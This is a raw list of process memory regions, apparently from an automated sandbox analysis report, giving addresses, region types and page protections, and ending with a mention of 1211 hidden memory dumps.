trusted library allocation
page read and write
400000
unkown
page readonly
5E22FBF000
stack
page read and write
24AB113E000
trusted library allocation
page read and write
7FF817F6C000
trusted library allocation
page execute and read and write
24AB0FAB000
trusted library allocation
page read and write
955000
heap
page read and write
9DD000
heap
page read and write
22C4EDC5000
trusted library allocation
page read and write
24AC5699000
trusted library allocation
page read and write
7DF444640000
trusted library allocation
page execute and read and write
7FF8181D0000
trusted library allocation
page read and write
24AAFBF2000
trusted library allocation
page read and write
24AC5733000
trusted library allocation
page read and write
24AC5750000
heap
page read and write
24AC56FB000
trusted library allocation
page read and write
294E5320000
heap
page read and write
2D5F000
stack
page read and write
24AC5950000
trusted library allocation
page read and write
300000
heap
page read and write
99D000
heap
page read and write
22C4F751000
heap
page read and write
24ABE522000
trusted library allocation
page read and write
2244CD4F000
heap
page read and write
AF0000
unkown
page readonly
22C4ED9E000
trusted library allocation
page read and write
22C51AE6000
heap
page read and write
2244CCF3000
heap
page read and write
294E5240000
heap
page read and write
22C4EDC5000
trusted library allocation
page read and write
22C4F707000
heap
page read and write
294E533E000
heap
page read and write
22C51AB9000
heap
page read and write
22C4ED9E000
trusted library allocation
page read and write
24ABDB6A000
trusted library allocation
page read and write
1C68B6F9000
heap
page read and write
1C68E51F000
direct allocation
page read and write
24AC5710000
trusted library allocation
page read and write
294E80BF000
direct allocation
page read and write
9D000
stack
page read and write
24AC5690000
trusted library allocation
page read and write
22C4EDA0000
trusted library allocation
page read and write
1C68B740000
heap
page read and write
1C68E4F0000
direct allocation
page read and write
24AACFED000
heap
page read and write
2244CD39000
heap
page read and write
2244CD7D000
heap
page read and write
294E52F1000
heap
page read and write
1DEADD7D000
heap
page read and write
22C51AE6000
heap
page read and write
1C68D03F000
direct allocation
page read and write
24AC5690000
trusted library allocation
page read and write
22C4E980000
heap
page read and write
294E52B6000
heap
page read and write
22C51ACF000
heap
page read and write
294E6C50000
direct allocation
page read and write
24AC5690000
trusted library allocation
page read and write
6DB000
heap
page read and write
2244D020000
heap
page read and write
7FF8180C0000
trusted library allocation
page read and write
401000
unkown
page execute read
24AC578E000
heap
page read and write
1C68D040000
direct allocation
page read and write
5E2297E000
stack
page read and write
9B6000
heap
page read and write
24AC5720000
trusted library allocation
page read and write
22C4EDA2000
trusted library allocation
page read and write
24AC572C000
direct allocation
page execute and read and write
22C51AD2000
heap
page read and write
24AC5970000
trusted library allocation
page read and write
22C4ED9E000
trusted library allocation
page read and write
2244CD73000
heap
page read and write
22C4EDA4000
trusted library allocation
page read and write
1429000
heap
page read and write
46C000
unclassified section
page readonly
24AB04C4000
trusted library allocation
page read and write
2AEF000
stack
page read and write
24AC56F0000
trusted library allocation
page read and write
3FDE000
trusted library allocation
page read and write
1C68D020000
direct allocation
page read and write
24AACFDF000
heap
page read and write
24AACFED000
heap
page read and write
24AAB460000
heap
page read and write
7FF818190000
trusted library allocation
page read and write
22C51AC3000
heap
page read and write
46A000
unclassified section
page read and write
294E5338000
heap
page read and write
22C51AA5000
heap
page read and write
7FF8181C0000
trusted library allocation
page read and write
294E6BF0000
direct allocation
page read and write
AF1000
unkown
page execute read
24AC56F2000
trusted library allocation
page read and write
9DE000
heap
page read and write
22C4EDB5000
trusted library allocation
page read and write
2244CCEA000
heap
page read and write
22C4EDB0000
trusted library allocation
page read and write
1C68B540000
heap
page read and write
7FF8180B0000
trusted library allocation
page read and write
107D000
stack
page read and write
1C68D027000
direct allocation
page read and write
2244CD4D000
heap
page read and write
22C51AC3000
heap
page read and write
22C4EDC5000
trusted library allocation
page read and write
24AACFF0000
heap
page read and write
1C68B71B000
heap
page read and write
22C4F708000
heap
page read and write
1C68B6F9000
heap
page read and write
404000
unkown
page read and write
18028CC0000
heap
page read and write
22C4F741000
heap
page read and write
461000
unclassified section
page execute read
22C4F760000
heap
page read and write
24ABE2FA000
trusted library allocation
page read and write
9E1000
heap
page read and write
24AACFE2000
heap
page read and write
193B5F7000
stack
page read and write
24AC56F0000
trusted library allocation
page read and write
24AC56D0000
trusted library allocation
page read and write
22C51AA6000
heap
page read and write
24ABE30A000
trusted library allocation
page read and write
294E52F1000
heap
page read and write
24AC59D0000
heap
page read and write
1C68B730000
heap
page read and write
24AACFE1000
heap
page read and write
24AC56E0000
trusted library allocation
page read and write
24AC5950000
trusted library allocation
page read and write
2244CBC0000
heap
page read and write
22C4F75F000
heap
page read and write
24AC5730000
trusted library allocation
page read and write
294E52B9000
heap
page read and write
1DEADD81000
heap
page read and write
1C68B736000
heap
page read and write
22C51ABC000
heap
page read and write
24ABE342000
trusted library allocation
page read and write
9D4000
heap
page read and write
24ABD459000
trusted library allocation
page read and write
7FF818120000
trusted library allocation
page read and write
24AC5691000
trusted library allocation
page read and write
22C4EDC5000
trusted library allocation
page read and write
22C4ED9E000
trusted library allocation
page read and write
22C4EDC5000
trusted library allocation
page read and write
2244CD16000
heap
page read and write
99D000
heap
page read and write
5E22EBE000
stack
page read and write
22C4ED95000
trusted library allocation
page read and write
22C51AA0000
heap
page read and write
B0AE7FF000
stack
page read and write
24AC56FB000
trusted library allocation
page read and write
22C4ED97000
trusted library allocation
page read and write
2EBE000
stack
page read and write
38B2000
trusted library allocation
page read and write
9C4000
heap
page read and write
400000
unkown
page readonly
1C68E502000
direct allocation
page read and write
22C51AD6000
heap
page read and write
2244CD34000
heap
page read and write
36DE000
stack
page read and write
90D000
stack
page read and write
1C68B6DE000
heap
page read and write
2244CD59000
heap
page read and write
24AC5700000
trusted library allocation
page read and write
99D000
heap
page read and write
24AC56FD000
trusted library allocation
page read and write
22C51AD6000
heap
page read and write
94C000
heap
page read and write
B02000
unkown
page readonly
24AC5730000
trusted library allocation
page read and write
24ABD24C000
trusted library allocation
page read and write
3FC7000
trusted library allocation
page read and write
7FF818092000
trusted library allocation
page read and write
294E5341000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
FA8000
heap
page read and write
79F67FF000
stack
page read and write
B02000
unkown
page readonly
952000
heap
page read and write
22C51AC3000
heap
page read and write
24AC5950000
trusted library allocation
page read and write
24AC578E000
heap
page read and write
22C4E999000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
22C4EDA4000
trusted library allocation
page read and write
2244CCF3000
heap
page read and write
9DD000
heap
page read and write
24AAB4AC000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
2BEE000
stack
page read and write
9C3000
heap
page read and write
294E530F000
heap
page read and write
24AC5720000
trusted library allocation
page read and write
2244CD7A000
heap
page read and write
22C51BE0000
trusted library allocation
page execute
4A9EE4B000
stack
page read and write
7FF8181B0000
trusted library allocation
page read and write
2244CD39000
heap
page read and write
22C51AAC000
heap
page read and write
22C4EDC5000
trusted library allocation
page read and write
346C000
stack
page read and write
24AC5700000
trusted library allocation
page read and write
24AC5705000
trusted library allocation
page read and write
22C4F751000
heap
page read and write
294E6CB0000
heap
page read and write
22C4F75A000
heap
page read and write
7FF817F70000
trusted library allocation
page execute and read and write
22C4F75F000
heap
page read and write
24AB0D52000
trusted library allocation
page read and write
1C68B726000
heap
page read and write
954000
heap
page read and write
24ABDBDA000
trusted library allocation
page read and write
24AACEF0000
heap
page read and write
22C4ED9E000
trusted library allocation
page read and write
79F677A000
stack
page read and write
395D000
trusted library allocation
page read and write
1C68B72B000
heap
page read and write
24AB0FBC000
trusted library allocation
page read and write
24AC5980000
trusted library allocation
page read and write
24ABDBB2000
trusted library allocation
page read and write
2244CCB9000
heap
page read and write
24ABE2B2000
trusted library allocation
page read and write
24AC56F3000
trusted library allocation
page read and write
2244CD4D000
heap
page read and write
24AC56D0000
trusted library allocation
page read and write
733000
heap
page read and write
5E22AFE000
stack
page read and write
2244CD3E000
heap
page read and write
24AC5700000
trusted library allocation
page read and write
294E52CC000
heap
page read and write
294E533E000
heap
page read and write
22C4F741000
heap
page read and write
19C87F8B000
heap
page read and write
2244CD73000
heap
page read and write
24AC5730000
trusted library allocation
page read and write
5E228FE000
stack
page read and write
9D0000
heap
page read and write
396B000
trusted library allocation
page read and write
BAF000
stack
page read and write
24AC56A7000
heap
page execute and read and write
24AB0FA1000
trusted library allocation
page read and write
1DEADD81000
heap
page read and write
24AB1136000
trusted library allocation
page read and write
24AC5832000
heap
page read and write
24AC56F3000
trusted library allocation
page read and write
24ABDF8A000
trusted library allocation
page read and write
5E22E38000
stack
page read and write
1C68B74F000
heap
page read and write
1DEADCA0000
heap
page read and write
24AC56F9000
trusted library allocation
page read and write
24ABD200000
trusted library allocation
page read and write
24AC5690000
trusted library allocation
page read and write
24ABE4FA000
trusted library allocation
page read and write
22C51ABC000
heap
page read and write
1C68B6E4000
heap
page read and write
24AC5700000
trusted library allocation
page read and write
1DEADD38000
heap
page read and write
24AC5960000
trusted library allocation
page read and write
22C4F75A000
heap
page read and write
2E30000
trusted library section
page readonly
7FF818147000
trusted library allocation
page read and write
24AC56FB000
trusted library allocation
page read and write
24AC5730000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
24AC5970000
trusted library allocation
page read and write
22C51AD2000
heap
page read and write
1C68E500000
direct allocation
page read and write
2244CD22000
heap
page read and write
64A000
heap
page read and write
7FF818061000
trusted library allocation
page read and write
24AAB3D0000
heap
page read and write
2244CC40000
heap
page read and write
24AAB50F000
heap
page read and write
24ABE69A000
trusted library allocation
page read and write
2244CD51000
heap
page read and write
7FF8181F0000
trusted library allocation
page read and write
87C000
trusted library allocation
page read and write
1C68E51F000
direct allocation
page read and write
6B3000
heap
page read and write
2244CCCA000
heap
page read and write
2244CCFD000
heap
page read and write
2244CD46000
heap
page read and write
24AACFDF000
heap
page read and write
1DEADCC0000
heap
page read and write
37EE000
trusted library allocation
page read and write
22C4EDA5000
trusted library allocation
page read and write
24ABE6BE000
trusted library allocation
page read and write
FA8000
heap
page read and write
22C51AA7000
heap
page read and write
2244CD7A000
heap
page read and write
24AC5690000
trusted library section
page read and write
24AC56B0000
trusted library allocation
page read and write
9DD000
heap
page read and write
24ABDF6A000
trusted library allocation
page read and write
2244CD61000
heap
page read and write
94F000
heap
page read and write
294E6C70000
direct allocation
page read and write
294E80A0000
direct allocation
page read and write
24AC5690000
trusted library allocation
page read and write
24AC56B0000
trusted library allocation
page read and write
294E52D5000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
36C000
stack
page read and write
1C68D100000
direct allocation
page read and write
1C68B730000
heap
page read and write
24AAB4E2000
heap
page read and write
9D8000
heap
page read and write
7FF818080000
trusted library allocation
page execute and read and write
9CD000
heap
page read and write
5E22B7E000
stack
page read and write
24AC5720000
trusted library allocation
page read and write
294E53D0000
direct allocation
page read and write
955000
heap
page read and write
AF1000
unkown
page execute read
22C51AA8000
heap
page read and write
325F000
stack
page read and write
24AC5690000
trusted library allocation
page read and write
22C4EDC5000
trusted library allocation
page read and write
3FEC000
trusted library allocation
page read and write
3A33000
trusted library allocation
page read and write
24AAB340000
heap
page read and write
9DD000
heap
page read and write
2244CD4F000
heap
page read and write
6BC000
heap
page read and write
9DD000
heap
page read and write
22C4F75F000
heap
page read and write
18029010000
heap
page read and write
24AC5980000
trusted library allocation
page read and write
22C51ACD000
heap
page read and write
2244CBE0000
heap
page read and write
24ABD662000
trusted library allocation
page read and write
1C68B6E1000
heap
page read and write
954000
heap
page read and write
294E52E1000
heap
page read and write
7FF8181A0000
trusted library allocation
page read and write
2244CCDB000
heap
page read and write
733000
heap
page read and write
28EB000
stack
page read and write
24AB0F7E000
trusted library allocation
page read and write
487000
heap
page read and write
952000
heap
page read and write
2244CD61000
heap
page read and write
24ABE712000
trusted library allocation
page read and write
9DD000
heap
page read and write
22C4F751000
heap
page read and write
24AC5CCD000
unkown
page read and write
2244CD59000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
2244CCB9000
heap
page read and write
AFD000
unkown
page readonly
24AC56D0000
trusted library allocation
page read and write
24AB1152000
trusted library allocation
page read and write
A7E000
stack
page read and write
24AC5720000
trusted library allocation
page read and write
9DD000
heap
page read and write
1DEADD84000
heap
page read and write
24AAB3B0000
heap
page read and write
951000
heap
page read and write
19C87ED0000
heap
page read and write
2244D02E000
heap
page read and write
22C51AD1000
heap
page read and write
A5E000
stack
page read and write
24AACF76000
heap
page read and write
294E52E6000
heap
page read and write
22C4EDC5000
trusted library allocation
page read and write
22C51AB9000
heap
page read and write
22C4EDA4000
trusted library allocation
page read and write
24AC5950000
trusted library allocation
page read and write
24AC5530000
trusted library allocation
page read and write
24ABD4C6000
trusted library allocation
page read and write
99D000
heap
page read and write
24ABE4B2000
trusted library allocation
page read and write
24ABDFCA000
trusted library allocation
page read and write
1C68D0E0000
direct allocation
page read and write
2244CCCF000
heap
page read and write
335A000
stack
page read and write
294E52FD000
heap
page read and write
3FEB000
trusted library allocation
page read and write
24AC5690000
trusted library allocation
page read and write
294E52D2000
heap
page read and write
2244CD7A000
heap
page read and write
24AC5727000
direct allocation
page execute and read and write
24AACEE0000
heap
page read and write
954000
heap
page read and write
22C4F75F000
heap
page read and write
24AC56F4000
trusted library allocation
page read and write
7FF818210000
trusted library allocation
page read and write
9E2000
heap
page read and write
18028CA0000
heap
page read and write
1DEADB70000
trusted library allocation
page read and write
24AC5710000
trusted library allocation
page read and write
22C51AE6000
heap
page read and write
22C51ABF000
heap
page read and write
22C51AB9000
heap
page read and write
22C4EDA7000
trusted library allocation
page read and write
2244CD51000
heap
page read and write
24AACF6B000
heap
page read and write
24AAB7D5000
heap
page read and write
9D2000
heap
page read and write
2244CD7D000
heap
page read and write
24AC56E0000
trusted library allocation
page read and write
22C4EDA4000
trusted library allocation
page read and write
610000
heap
page read and write
22C51AC3000
heap
page read and write
2244CD34000
heap
page read and write
22C4F6F0000
heap
page read and write
2244CD46000
heap
page read and write
22C4F762000
heap
page read and write
22C4F75B000
heap
page read and write
2244CC44000
heap
page read and write
336D000
stack
page read and write
294E6C90000
direct allocation
page read and write
1C68B6E2000
heap
page read and write
24AAF1F2000
trusted library allocation
page read and write
14AB000
heap
page read and write
22C4EDA4000
trusted library allocation
page read and write
1C68B680000
heap
page read and write
1C68B72B000
heap
page read and write
2244CD59000
heap
page read and write
22C4F762000
heap
page read and write
24ABDBC2000
trusted library allocation
page read and write
954000
heap
page read and write
A02000
heap
page read and write
24AC5779000
heap
page read and write
22C51ABF000
heap
page read and write
3C0000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
2244CD49000
heap
page read and write
1C68B752000
heap
page read and write
1C68D0A0000
direct allocation
page read and write
22C4F6F3000
heap
page read and write
24AC59A0000
trusted library allocation
page read and write
1DEADF90000
heap
page read and write
79F667E000
stack
page read and write
7FF818097000
trusted library allocation
page read and write
24ABE70A000
trusted library allocation
page read and write
7FF818220000
trusted library allocation
page read and write
406000
unkown
page readonly
953000
heap
page read and write
24AB0FCF000
trusted library allocation
page read and write
22C4ED97000
trusted library allocation
page read and write
7C1000
trusted library allocation
page read and write
22C4F727000
heap
page read and write
24AACEE5000
heap
page read and write
94C000
heap
page read and write
8CE000
stack
page read and write
1C68D060000
direct allocation
page read and write
22C51AB9000
heap
page read and write
24AC5832000
heap
page read and write
22C4EDA4000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
79F6879000
stack
page read and write
24AC5690000
trusted library allocation
page read and write
2244CD61000
heap
page read and write
1C68D0C0000
direct allocation
page read and write
5E22F3F000
stack
page read and write
955000
heap
page read and write
24AAB4E4000
heap
page read and write
7FF8180D0000
trusted library allocation
page read and write
954000
heap
page read and write
2DDE000
stack
page read and write
9DD000
heap
page read and write
7FF818250000
trusted library allocation
page read and write
22C4ED9E000
trusted library allocation
page read and write
24AC5970000
trusted library allocation
page read and write
2244CD22000
heap
page read and write
24AACF65000
heap
page read and write
22C51AE6000
heap
page read and write
22C51ACD000
heap
page read and write
99D000
heap
page read and write
24AC5950000
trusted library allocation
page read and write
9DD000
heap
page read and write
1DEADF60000
trusted library allocation
page read and write
2244CD32000
heap
page read and write
1C68B5A0000
remote allocation
page read and write
24AAB469000
heap
page read and write
1C68D150000
heap
page read and write
1C68D03D000
direct allocation
page read and write
707000
heap
page read and write
18028D40000
heap
page read and write
2244CCEA000
heap
page read and write
24AC56F3000
trusted library allocation
page read and write
294E52F6000
heap
page read and write
4A9EF4F000
stack
page read and write
22C4ED95000
trusted library allocation
page read and write
1C68B6E1000
heap
page read and write
6A7000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
2244CD53000
heap
page read and write
24ABD258000
trusted library allocation
page read and write
B0AE5FE000
stack
page read and write
24ABE6CA000
trusted library allocation
page read and write
1C68B72E000
heap
page read and write
22C51AC0000
heap
page read and write
24AC5950000
trusted library allocation
page read and write
38A7000
trusted library allocation
page read and write
1C68D023000
direct allocation
page read and write
99D000
heap
page read and write
22C4F75F000
heap
page read and write
24AC56F0000
trusted library allocation
page read and write
954000
heap
page read and write
2244CD22000
heap
page read and write
2E2F000
stack
page read and write
1DEADB60000
heap
page read and write
24AC56F0000
trusted library allocation
page read and write
1C68B72B000
heap
page read and write
9DD000
heap
page read and write
24AB0DA9000
trusted library allocation
page read and write
24AC5700000
trusted library allocation
page read and write
22C4F727000
heap
page read and write
294E5298000
heap
page read and write
6C2000
heap
page read and write
24AC56D0000
trusted library allocation
page read and write
1C68B6CA000
heap
page read and write
A9E000
stack
page read and write
ADE000
stack
page read and write
5E2303B000
stack
page read and write
24AC56F0000
trusted library allocation
page read and write
22C51ACD000
heap
page read and write
1DEADF99000
heap
page read and write
19C000
stack
page read and write
24AC5540000
trusted library allocation
page read and write
24AAB4A2000
heap
page read and write
24AC5838000
heap
page read and write
294E8090000
direct allocation
page read and write
24AC56F2000
trusted library allocation
page read and write
22C4F75F000
heap
page read and write
1C68B72E000
heap
page read and write
24ABE14A000
trusted library allocation
page read and write
294E52BA000
heap
page read and write
22C4EDD0000
heap
page readonly
24AC56F0000
trusted library allocation
page read and write
37F0000
trusted library allocation
page read and write
2244CD7A000
heap
page read and write
2244CD51000
heap
page read and write
9C3000
heap
page read and write
24AB0EC1000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
1DEADD79000
heap
page read and write
24AC56F0000
trusted library allocation
page read and write
22C4F743000
heap
page read and write
24ABDB8D000
trusted library allocation
page read and write
22C4F75A000
heap
page read and write
6B9000
heap
page read and write
954000
heap
page read and write
2244CD49000
heap
page read and write
22C4ED91000
trusted library allocation
page read and write
2244CD73000
heap
page read and write
1DEADEF0000
heap
page readonly
1C68B6DC000
heap
page read and write
24ABD1F1000
trusted library allocation
page read and write
2244CD49000
heap
page read and write
24AC5773000
heap
page read and write
1C68B6D7000
heap
page read and write
294E52A4000
heap
page read and write
24AC5540000
trusted library allocation
page read and write
24AC5690000
trusted library allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
1C68B6C0000
heap
page read and write
1000FC000
stack
page read and write
355F000
stack
page read and write
2244CD26000
heap
page read and write
24AC56F0000
trusted library allocation
page read and write
2244CD16000
heap
page read and write
22C51ACD000
heap
page read and write
1C68B72E000
heap
page read and write
1C68E510000
direct allocation
page read and write
24AACE36000
trusted library allocation
page read and write
9DD000
heap
page read and write
294E52D1000
heap
page read and write
7FF8180F0000
trusted library allocation
page read and write
7FF817EB3000
trusted library allocation
page execute and read and write
24AC56E0000
trusted library allocation
page read and write
24AAB7C0000
trusted library allocation
page read and write
1DEADF10000
trusted library allocation
page read and write
24AB0E51000
trusted library allocation
page read and write
4A9E6FE000
stack
page read and write
79F63BF000
stack
page read and write
1C68B6D7000
heap
page read and write
2244CCCA000
heap
page read and write
1C68B6C6000
heap
page read and write
24ABDD7A000
trusted library allocation
page read and write
1001FF000
stack
page read and write
86D000
trusted library allocation
page read and write
2244CD4F000
heap
page read and write
3FEC000
trusted library allocation
page read and write
294E6BEF000
direct allocation
page read and write
24AC56F0000
trusted library allocation
page read and write
24ABE34A000
trusted library allocation
page read and write
420000
trusted library allocation
page read and write
22C4EC30000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
294E5341000
heap
page read and write
1C68B746000
heap
page read and write
2E76000
trusted library allocation
page read and write
1C68B730000
heap
page read and write
2D9E000
stack
page read and write
1DEADD53000
heap
page read and write
24AAD00A000
heap
page read and write
24AC5730000
trusted library allocation
page read and write
1196000
heap
page read and write
952000
heap
page read and write
22C4EDA4000
trusted library allocation
page read and write
9BA000
heap
page read and write
7C0000
trusted library allocation
page read and write
24AC5CD2000
unkown
page read and write
4A9E9FE000
stack
page read and write
22C51AE6000
heap
page read and write
294E5290000
heap
page read and write
24AC56FA000
trusted library allocation
page read and write
24AC5692000
trusted library allocation
page read and write
294E52C7000
heap
page read and write
24AC5700000
trusted library allocation
page read and write
24AC56F1000
trusted library allocation
page read and write
22C51ABC000
heap
page read and write
9DD000
heap
page read and write
22C4EDA4000
trusted library allocation
page read and write
59E000
stack
page read and write
294E52CE000
heap
page read and write
22C4F751000
heap
page read and write
954000
heap
page read and write
D0E000
stack
page read and write
24AB04CD000
trusted library allocation
page read and write
24AC56D0000
trusted library allocation
page read and write
3F0000
heap
page read and write
2244CD7E000
heap
page read and write
24AAB4BC000
heap
page read and write
1DEAEA90000
trusted library allocation
page read and write
5E22BFE000
stack
page read and write
3FD4000
trusted library allocation
page read and write
2244CD23000
heap
page read and write
24AC56E0000
trusted library allocation
page read and write
A02000
heap
page read and write
24AACE70000
trusted library allocation
page read and write
22C4EDA4000
trusted library allocation
page read and write
294E52F1000
heap
page read and write
24AACFED000
heap
page read and write
24AACFED000
heap
page read and write
954000
heap
page read and write
24ABE2E2000
trusted library allocation
page read and write
954000
heap
page read and write
4A9DF87000
stack
page read and write
2244CC80000
heap
page read and write
7FF818170000
trusted library allocation
page read and write
22C51ABF000
heap
page read and write
24AC5980000
trusted library allocation
page read and write
24AC5690000
trusted library allocation
page read and write
19C881E0000
heap
page read and write
5E23A0E000
stack
page read and write
7FF818160000
trusted library allocation
page read and write
1C68B870000
heap
page read and write
22C4ED9E000
trusted library allocation
page read and write
24ABE532000
trusted library allocation
page read and write
22C4F741000
heap
page read and write
FA8000
heap
page read and write
294E5100000
heap
page read and write
22C4F743000
heap
page read and write
24ABDB9A000
trusted library allocation
page read and write
24AC56F4000
trusted library allocation
page read and write
640000
heap
page read and write
24AC56C0000
trusted library allocation
page read and write
1C68B6B4000
heap
page read and write
24AC5690000
trusted library allocation
page read and write
22C4F75F000
heap
page read and write
24AAB440000
trusted library allocation
page read and write
2244CD7D000
heap
page read and write
79F66F9000
stack
page read and write
22C4F762000
heap
page read and write
24AACF7A000
heap
page read and write
24AC56F0000
trusted library allocation
page read and write
2244D026000
heap
page read and write
1456000
heap
page read and write
7FF817F96000
trusted library allocation
page execute and read and write
There are 1211 hidden memdumps, click here to show them.